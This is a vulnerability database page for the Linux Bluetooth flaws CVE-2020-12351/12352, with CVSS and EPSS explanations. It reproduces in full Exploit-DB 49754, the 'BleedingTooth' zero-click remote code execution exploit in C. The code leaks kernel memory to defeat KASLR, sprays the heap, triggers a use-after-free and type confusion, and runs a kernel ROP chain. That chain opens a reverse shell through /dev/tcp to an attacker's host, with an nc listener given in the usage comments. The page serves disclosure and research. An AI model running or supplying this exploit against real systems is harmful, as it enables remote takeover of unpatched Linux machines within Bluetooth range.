Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-909 |
Missing Initialization of Resource The product does not initialize a critical resource. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V3.1 |
6.5 |
MEDIUM |
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. The vulnerable component is bound to the network stack, but the attack is limited at the protocol level to a logically adjacent topology. This can mean an attack must be launched from the same shared physical (e.g., Bluetooth or IEEE 802.11) or logical (e.g., local IP subnet) network, or from within a secure or otherwise limited administrative domain (e.g., MPLS, secure VPN to an administrative network zone). Attack Complexity This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. User Interaction This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component. The vulnerable system can be exploited without interaction from any user. Base: Scope MetricsThe Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. Scope Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs. An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority. Base: Impact MetricsThe Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. There is no loss of integrity within the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. There is no impact to availability within the impacted component. Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability. Environmental MetricsThese metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.
|
[email protected] |
V2 |
3.3 |
|
AV:A/AC:L/Au:N/C:P/I:N/A:N |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 49754
Publication date : 2021-04-07 22h00 +00:00
Author : Google Security Research
EDB Verified : No
# Exploit Title: Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution
# Date: 06/04/2020
# Exploit Author: Google Security Research (Andy Nguyen)
# Tested on: 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
# CVE : CVE-2020-12351, CVE-2020-12352
/*
* BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution
* by Andy Nguyen (theflow@)
*
* This Proof-Of-Concept demonstrates the exploitation of
* CVE-2020-12351 and CVE-2020-12352.
*
* Compile using:
* $ gcc -o exploit exploit.c -lbluetooth
*
* and execute as:
* $ sudo ./exploit target_mac source_ip source_port
*
* In another terminal, run:
* $ nc -lvp 1337
* exec bash -i 2>&0 1>&0
*
* If successful, a calc can be spawned with:
* export XAUTHORITY=/run/user/1000/gdm/Xauthority
* export DISPLAY=:0
* gnome-calculator
*
* This Proof-Of-Concept has been tested against a Dell XPS 15 running
* Ubuntu 20.04.1 LTS with:
* - 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020
* x86_64 x86_64 x86_64 GNU/Linux
*
* The success rate of the exploit is estimated at 80%.
*/
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <bluetooth/l2cap.h>
#include <errno.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>
#define REMOTE_COMMAND "/bin/bash -c /bin/bash</dev/tcp/%s/%s"
// Increase if the heap spray is not reliable.
#define NUM_SPRAY_KMALLOC_1024 6
#define NUM_SPRAY_KMALLOC_128 6
// Increase if stuck at sending packets.
#define HCI_SEND_ACL_DATA_WAIT_USEC 5000
#define KERNEL_TEXT_BASE 0xffffffff81000000
#define KERNEL_UBUNTU_5_4_0_48 1
#ifdef KERNEL_UBUNTU_5_4_0_48
#define PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET 0xffffffff81567f46
#define POP_RAX_RET 0xffffffff8103d0b1
#define POP_RDI_RET 0xffffffff8108efa0
#define JMP_RAX 0xffffffff8100005b
#define RUN_CMD 0xffffffff810ce470
#define DO_TASK_DEAD 0xffffffff810dc260
#define KASLR_DEFEAT(kaslr_offset, kernel_addr) \
do { \
if ((kernel_addr & 0xfffff) == 0xf4d8e) \
kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xf4d8e; \
else \
kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xc001a4; \
} while (0)
#else
#error "No kernel version defined"
#endif
#define L2CAP_IDENT 0x41
#define SIGNALLING_CID 0x01
#define AMP_MGR_CID 0x03
typedef struct {
uint8_t code;
uint8_t ident;
uint16_t len;
} __attribute__((packed)) a2mp_hdr;
#define A2MP_HDR_SIZE 4
#define A2MP_COMMAND_REJ 0x01
typedef struct {
uint16_t reason;
} __attribute__((packed)) a2mp_command_rej;
#define A2MP_INFO_REQ 0x06
typedef struct {
uint8_t id;
} __attribute__((packed)) a2mp_info_req;
#define A2MP_INFO_RSP 0x07
typedef struct {
uint8_t id;
uint8_t status;
uint32_t total_bw;
uint32_t max_bw;
uint32_t min_latency;
uint16_t pal_caps;
uint16_t assoc_size;
} __attribute__((packed)) a2mp_info_rsp;
#define A2MP_ASSOC_REQ 0x08
typedef struct {
uint8_t id;
} __attribute__((packed)) a2mp_assoc_req;
#define A2MP_ASSOC_RSP 0x09
typedef struct {
uint8_t id;
uint8_t status;
uint8_t assoc_data[0];
} __attribute__((packed)) a2mp_assoc_rsp;
typedef struct {
uint8_t mode;
uint8_t txwin_size;
uint8_t max_transmit;
uint16_t retrans_timeout;
uint16_t monitor_timeout;
uint16_t max_pdu_size;
} __attribute__((packed)) l2cap_conf_rfc;
static char remote_command[64];
static int hci_sock = 0, l2_sock = 0;
static uint16_t hci_handle = 0;
static uint64_t kaslr_offset = 0, l2cap_chan_addr = 0;
static uint16_t crc16_tab[] = {
0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241, 0xC601,
0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440, 0xCC01, 0x0CC0,
0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40, 0x0A00, 0xCAC1, 0xCB81,
0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841, 0xD801, 0x18C0, 0x1980, 0xD941,
0x1B00, 0xDBC1, 0xDA81, 0x1A40, 0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01,
0x1DC0, 0x1C80, 0xDC41, 0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0,
0x1680, 0xD641, 0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081,
0x1040, 0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240,
0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441, 0x3C00,
0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41, 0xFA01, 0x3AC0,
0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840, 0x2800, 0xE8C1, 0xE981,
0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41, 0xEE01, 0x2EC0, 0x2F80, 0xEF41,
0x2D00, 0xEDC1, 0xEC81, 0x2C40, 0xE401, 0x24C0, 0x2580, 0xE541, 0x2700,
0xE7C1, 0xE681, 0x2640, 0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0,
0x2080, 0xE041, 0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281,
0x6240, 0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441,
0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41, 0xAA01,
0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840, 0x7800, 0xB8C1,
0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41, 0xBE01, 0x7EC0, 0x7F80,
0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40, 0xB401, 0x74C0, 0x7580, 0xB541,
0x7700, 0xB7C1, 0xB681, 0x7640, 0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101,
0x71C0, 0x7080, 0xB041, 0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0,
0x5280, 0x9241, 0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481,
0x5440, 0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40,
0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841, 0x8801,
0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40, 0x4E00, 0x8EC1,
0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41, 0x4400, 0x84C1, 0x8581,
0x4540, 0x8701, 0x47C0, 0x4680, 0x8641, 0x8201, 0x42C0, 0x4380, 0x8341,
0x4100, 0x81C1, 0x8081, 0x4040,
};
static uint16_t crc16(uint16_t crc, const void *buf, size_t size) {
const uint8_t *p = buf;
while (size--)
crc = crc16_tab[(crc ^ (*p++)) & 0xff] ^ (crc >> 8);
return crc;
}
static int connect_l2cap(bdaddr_t dst_addr, uint16_t *handle) {
int l2_sock;
if ((l2_sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) {
perror("[-] socket");
exit(1);
}
struct sockaddr_l2 laddr = {0};
laddr.l2_family = AF_BLUETOOTH;
memcpy(&laddr.l2_bdaddr, BDADDR_ANY, sizeof(bdaddr_t));
if (bind(l2_sock, (struct sockaddr *)&laddr, sizeof(laddr)) < 0) {
perror("[-] bind");
exit(1);
}
struct sockaddr_l2 raddr = {0};
raddr.l2_family = AF_BLUETOOTH;
raddr.l2_bdaddr = dst_addr;
if (connect(l2_sock, (struct sockaddr *)&raddr, sizeof(raddr)) < 0 &&
errno != EALREADY) {
perror("[-] connect");
exit(1);
}
struct l2cap_conninfo conninfo = {0};
socklen_t len = sizeof(conninfo);
if (getsockopt(l2_sock, SOL_L2CAP, L2CAP_CONNINFO, &conninfo, &len) < 0) {
perror("[-] getsockopt");
exit(1);
}
if (handle)
*handle = conninfo.hci_handle;
return l2_sock;
}
static int connect_hci(void) {
struct hci_dev_info di = {0};
int hci_device_id = hci_get_route(NULL);
int hci_sock = hci_open_dev(hci_device_id);
if (hci_devinfo(hci_device_id, &di) < 0) {
perror("[-] hci_devinfo");
exit(1);
}
struct hci_filter flt = {0};
hci_filter_clear(&flt);
hci_filter_all_ptypes(&flt);
hci_filter_all_events(&flt);
if (setsockopt(hci_sock, SOL_HCI, HCI_FILTER, &flt, sizeof(flt)) < 0) {
perror("[-] setsockopt(HCI_FILTER)");
exit(1);
}
return hci_sock;
}
static void wait_event_complete_packet(void) {
while (1) {
uint8_t buf[256] = {0};
if (read(hci_sock, buf, sizeof(buf)) < 0) {
perror("[-] read");
exit(1);
}
if (buf[0] == HCI_EVENT_PKT) {
hci_event_hdr *hdr = (hci_event_hdr *)&buf[1];
if (btohs(hdr->evt) == EVT_NUM_COMP_PKTS)
break;
}
}
}
static void hci_send_acl_data(int hci_sock, uint16_t hci_handle, void *data,
uint16_t data_length, uint16_t flags) {
uint8_t type = HCI_ACLDATA_PKT;
hci_acl_hdr hdr = {0};
hdr.handle = htobs(acl_handle_pack(hci_handle, flags));
hdr.dlen = data_length;
struct iovec iv[3] = {0};
iv[0].iov_base = &type;
iv[0].iov_len = sizeof(type);
iv[1].iov_base = &hdr;
iv[1].iov_len = HCI_ACL_HDR_SIZE;
iv[2].iov_base = data;
iv[2].iov_len = data_length;
if (writev(hci_sock, iv, sizeof(iv) / sizeof(struct iovec)) < 0) {
perror("[-] writev");
exit(1);
}
usleep(HCI_SEND_ACL_DATA_WAIT_USEC);
wait_event_complete_packet();
}
static void disconnect_a2mp(void) {
printf("[*] Disconnecting A2MP channel...\n");
struct {
l2cap_hdr hdr;
l2cap_cmd_hdr cmd_hdr;
l2cap_disconn_req disconn_req;
} disconn_req = {0};
disconn_req.hdr.len = htobs(sizeof(disconn_req) - L2CAP_HDR_SIZE);
disconn_req.hdr.cid = htobs(SIGNALLING_CID);
disconn_req.cmd_hdr.code = L2CAP_DISCONN_REQ;
disconn_req.cmd_hdr.ident = L2CAP_IDENT;
disconn_req.cmd_hdr.len =
htobs(sizeof(disconn_req) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);
disconn_req.disconn_req.dcid = htobs(AMP_MGR_CID);
disconn_req.disconn_req.scid = htobs(AMP_MGR_CID);
hci_send_acl_data(hci_sock, hci_handle, &disconn_req, sizeof(disconn_req), 2);
}
static void connect_a2mp(void) {
printf("[*] Connecting A2MP channel...\n");
struct {
l2cap_hdr hdr;
} a2mp_create = {0};
a2mp_create.hdr.len = htobs(sizeof(a2mp_create) - L2CAP_HDR_SIZE);
a2mp_create.hdr.cid = htobs(AMP_MGR_CID);
hci_send_acl_data(hci_sock, hci_handle, &a2mp_create, sizeof(a2mp_create), 2);
// Configure to L2CAP_MODE_BASIC and max MTU.
struct {
l2cap_hdr hdr;
l2cap_cmd_hdr cmd_hdr;
l2cap_conf_rsp conf_rsp;
l2cap_conf_opt conf_opt;
l2cap_conf_rfc conf_rfc;
l2cap_conf_opt conf_opt2;
uint16_t conf_mtu;
} conf_rsp = {0};
conf_rsp.hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE);
conf_rsp.hdr.cid = htobs(SIGNALLING_CID);
conf_rsp.cmd_hdr.code = L2CAP_CONF_RSP;
conf_rsp.cmd_hdr.ident = L2CAP_IDENT;
conf_rsp.cmd_hdr.len =
htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);
conf_rsp.conf_rsp.scid = htobs(AMP_MGR_CID);
conf_rsp.conf_rsp.flags = htobs(0);
conf_rsp.conf_rsp.result = htobs(L2CAP_CONF_UNACCEPT);
conf_rsp.conf_opt.type = L2CAP_CONF_RFC;
conf_rsp.conf_opt.len = sizeof(l2cap_conf_rfc);
conf_rsp.conf_rfc.mode = L2CAP_MODE_BASIC;
conf_rsp.conf_opt2.type = L2CAP_CONF_MTU;
conf_rsp.conf_opt2.len = sizeof(uint16_t);
conf_rsp.conf_mtu = htobs(0xffff);
hci_send_acl_data(hci_sock, hci_handle, &conf_rsp, sizeof(conf_rsp), 2);
}
static void prepare_l2cap_chan_addr_leak(void) {
printf("[*] Preparing to leak l2cap_chan address...\n");
struct {
l2cap_hdr hdr;
l2cap_cmd_hdr cmd_hdr;
l2cap_conf_rsp conf_rsp;
l2cap_conf_opt conf_opt;
l2cap_conf_rfc conf_rfc;
} conf_rsp = {0};
conf_rsp.hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE);
conf_rsp.hdr.cid = htobs(SIGNALLING_CID);
conf_rsp.cmd_hdr.code = L2CAP_CONF_RSP;
conf_rsp.cmd_hdr.ident = L2CAP_IDENT;
conf_rsp.cmd_hdr.len =
htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);
conf_rsp.conf_rsp.scid = htobs(AMP_MGR_CID);
conf_rsp.conf_rsp.flags = htobs(0);
conf_rsp.conf_rsp.result = htobs(L2CAP_CONF_UNACCEPT);
conf_rsp.conf_opt.type = L2CAP_CONF_RFC;
conf_rsp.conf_opt.len = sizeof(l2cap_conf_rfc);
conf_rsp.conf_rfc.mode = L2CAP_MODE_ERTM;
hci_send_acl_data(hci_sock, hci_handle, &conf_rsp, sizeof(conf_rsp), 2);
}
static uint64_t leak_kstack(void) {
printf("[*] Leaking A2MP kernel stack memory...\n");
struct {
l2cap_hdr hdr;
a2mp_hdr amp_hdr;
a2mp_info_req info_req;
} info_req = {0};
info_req.hdr.len = htobs(sizeof(info_req) - L2CAP_HDR_SIZE);
info_req.hdr.cid = htobs(AMP_MGR_CID);
info_req.amp_hdr.code = A2MP_INFO_REQ;
info_req.amp_hdr.ident = L2CAP_IDENT;
info_req.amp_hdr.len =
htobs(sizeof(info_req) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
// Use a dummy id to make hci_dev_get() fail.
info_req.info_req.id = 0x42;
hci_send_acl_data(hci_sock, hci_handle, &info_req, sizeof(info_req), 2);
while (1) {
uint8_t buf[256] = {0};
if (read(hci_sock, buf, sizeof(buf)) < 0) {
perror("[-] read");
exit(1);
}
if (buf[0] == HCI_ACLDATA_PKT) {
l2cap_hdr *l2_hdr = (l2cap_hdr *)&buf[5];
if (btohs(l2_hdr->cid) == AMP_MGR_CID) {
a2mp_hdr *amp_hdr = (a2mp_hdr *)&buf[9];
if (amp_hdr->code == A2MP_INFO_RSP)
return *(uint64_t *)&buf[21];
}
}
}
return 0;
}
static void trigger_type_confusion(void) {
struct {
l2cap_hdr hdr;
uint16_t ctrl;
a2mp_hdr amp_hdr;
a2mp_command_rej cmd_rej;
uint16_t fcs;
} cmd_rej = {0};
cmd_rej.hdr.len = htobs(sizeof(cmd_rej) - L2CAP_HDR_SIZE);
cmd_rej.hdr.cid = htobs(AMP_MGR_CID);
cmd_rej.ctrl = 0xffff;
cmd_rej.amp_hdr.code = A2MP_COMMAND_REJ;
cmd_rej.amp_hdr.ident = L2CAP_IDENT;
cmd_rej.amp_hdr.len = htobs(sizeof(cmd_rej) - L2CAP_HDR_SIZE -
sizeof(a2mp_hdr) - sizeof(uint32_t));
cmd_rej.cmd_rej.reason = 0;
cmd_rej.fcs = crc16(0, &cmd_rej, sizeof(cmd_rej) - sizeof(uint16_t));
hci_send_acl_data(hci_sock, hci_handle, &cmd_rej, sizeof(cmd_rej), 2);
}
static void build_krop(uint64_t *rop, uint64_t cmd_addr) {
*rop++ = kaslr_offset + POP_RAX_RET;
*rop++ = kaslr_offset + RUN_CMD;
*rop++ = kaslr_offset + POP_RDI_RET;
*rop++ = cmd_addr;
*rop++ = kaslr_offset + JMP_RAX;
*rop++ = kaslr_offset + POP_RAX_RET;
*rop++ = kaslr_offset + DO_TASK_DEAD;
*rop++ = kaslr_offset + JMP_RAX;
}
static void build_payload(uint8_t data[0x400]) {
// Fake sk_filter object starting at offset 0x300.
*(uint64_t *)&data[0x318] = l2cap_chan_addr + 0x320; // prog
// Fake bpf_prog object starting at offset 0x320.
// RBX points to the amp_mgr object.
*(uint64_t *)&data[0x350] =
kaslr_offset +
PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET; // bpf_func
*(uint64_t *)&data[0x358] = 0xDEADBEEF; // rbp
// Build kernel ROP chain that executes run_cmd() from kernel/reboot.c.
// Note that when executing the ROP chain, the data below in memory will be
// overwritten. Therefore, the argument should be located after the ROP chain.
build_krop((uint64_t *)&data[0x360], l2cap_chan_addr + 0x3c0);
strncpy(&data[0x3c0], remote_command, 0x40);
}
static void spray_kmalloc_1024(int num) {
// Skip first two hci devices because they may be legit.
for (int i = 2; i < num + 2; i++) {
printf("\r[*] Sending packet with id #%d...", i);
fflush(stdout);
struct {
l2cap_hdr hdr;
a2mp_hdr amp_hdr;
a2mp_info_rsp info_rsp;
} info_rsp = {0};
info_rsp.hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE);
info_rsp.hdr.cid = htobs(AMP_MGR_CID);
info_rsp.amp_hdr.code = A2MP_INFO_RSP;
info_rsp.amp_hdr.ident = L2CAP_IDENT;
info_rsp.amp_hdr.len =
htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
info_rsp.info_rsp.id = i;
hci_send_acl_data(hci_sock, hci_handle, &info_rsp, sizeof(info_rsp), 2);
struct {
l2cap_hdr hdr;
a2mp_hdr amp_hdr;
a2mp_assoc_rsp assoc_rsp;
uint8_t data[0x400];
} assoc_rsp = {0};
assoc_rsp.hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE);
assoc_rsp.hdr.cid = htobs(AMP_MGR_CID);
assoc_rsp.amp_hdr.code = A2MP_ASSOC_RSP;
assoc_rsp.amp_hdr.ident = L2CAP_IDENT;
assoc_rsp.amp_hdr.len =
htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
assoc_rsp.assoc_rsp.id = i;
for (int j = 0; j < sizeof(assoc_rsp.data); j += 8)
memset(&assoc_rsp.data[j], 'A' + j / 8, 8);
build_payload(assoc_rsp.data);
// Send fragmented l2cap packets (assume ACL MTU is at least 256 bytes).
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp,
sizeof(assoc_rsp) - sizeof(assoc_rsp.data), 2);
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x000], 0x100, 1);
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x100], 0x100, 1);
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x200], 0x100, 1);
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x300], 0x100, 1);
}
printf("\n");
}
static void spray_kmalloc_128(int num) {
// Skip first two hci devices because they may be legit.
for (int i = 2; i < num + 2; i++) {
printf("\r[*] Sending packet with id #%d...", i);
fflush(stdout);
struct {
l2cap_hdr hdr;
a2mp_hdr amp_hdr;
a2mp_info_rsp info_rsp;
} info_rsp = {0};
info_rsp.hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE);
info_rsp.hdr.cid = htobs(AMP_MGR_CID);
info_rsp.amp_hdr.code = A2MP_INFO_RSP;
info_rsp.amp_hdr.ident = L2CAP_IDENT;
info_rsp.amp_hdr.len =
htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
info_rsp.info_rsp.id = i;
hci_send_acl_data(hci_sock, hci_handle, &info_rsp, sizeof(info_rsp), 2);
struct {
l2cap_hdr hdr;
a2mp_hdr amp_hdr;
a2mp_assoc_rsp assoc_rsp;
uint8_t data[0x80];
} assoc_rsp = {0};
assoc_rsp.hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE);
assoc_rsp.hdr.cid = htobs(AMP_MGR_CID);
assoc_rsp.amp_hdr.code = A2MP_ASSOC_RSP;
assoc_rsp.amp_hdr.ident = L2CAP_IDENT;
assoc_rsp.amp_hdr.len =
htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
assoc_rsp.assoc_rsp.id = i;
for (int j = 0; j < sizeof(assoc_rsp.data); j += 8)
memset(&assoc_rsp.data[j], 'A' + j / 8, 8);
// Fake sock object.
*(uint64_t *)&assoc_rsp.data[0x10] = l2cap_chan_addr + 0x300; // sk_filter
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp, sizeof(assoc_rsp), 2);
}
printf("\n");
}
int main(int argc, char *argv[]) {
if (argc != 4) {
printf("Usage: %s target_mac source_ip source_port\n", argv[0]);
exit(1);
}
bdaddr_t dst_addr = {0};
str2ba(argv[1], &dst_addr);
snprintf(remote_command, sizeof(remote_command), REMOTE_COMMAND, argv[2],
argv[3]);
printf("[+] Remote command: %s\n", remote_command);
printf("[*] Opening hci device...\n");
hci_sock = connect_hci();
printf("[*] Connecting to victim...\n");
l2_sock = connect_l2cap(dst_addr, &hci_handle);
printf("[+] HCI handle: %x\n", hci_handle);
connect_a2mp();
uint64_t kernel_addr = leak_kstack();
printf("[+] Kernel address: %lx\n", kernel_addr);
KASLR_DEFEAT(kaslr_offset, kernel_addr);
printf("[+] KASLR offset: %lx\n", kaslr_offset);
if ((kaslr_offset & 0xfffff) != 0) {
printf("[-] Error KASLR offset is invalid.\n");
exit(1);
}
prepare_l2cap_chan_addr_leak();
l2cap_chan_addr = leak_kstack() - 0x110;
printf("[+] l2cap_chan address: %lx\n", l2cap_chan_addr);
if ((l2cap_chan_addr & 0xff) != 0) {
printf("[-] Error l2cap_chan address is invalid.\n");
exit(1);
}
// Somehow, spraying a bit before makes the UaF more reliable.
printf("[*] Spraying kmalloc-1024...\n");
spray_kmalloc_1024(0x40);
// Disconnect to free the l2cap_chan object, then reconnect.
disconnect_a2mp();
connect_a2mp();
// Attempt to reclaim the freed l2cap_chan object.
printf("[*] Spraying kmalloc-1024...\n");
for (int i = 0; i < NUM_SPRAY_KMALLOC_1024; i++) {
spray_kmalloc_1024(0x40);
}
// Attempt to control the out-of-bounds read.
printf("[*] Spraying kmalloc-128...\n");
for (int i = 0; i < NUM_SPRAY_KMALLOC_128; i++) {
spray_kmalloc_128(0x40);
}
printf("[*] Triggering remote code execution...\n");
disconnect_a2mp();
trigger_type_confusion();
close(l2_sock);
hci_close_dev(hci_sock);
return 0;
}
Products Mentioned
Configuraton 0
Linux>>Linux_kernel >> Version From (including) 5.4 To (excluding) 5.4.72
Linux>>Linux_kernel >> Version From (including) 5.8.0 To (excluding) 5.8.16
Linux>>Linux_kernel >> Version From (including) 5.9.0 To (including) 5.9.13
Bluez>>Bluez >> Version *
References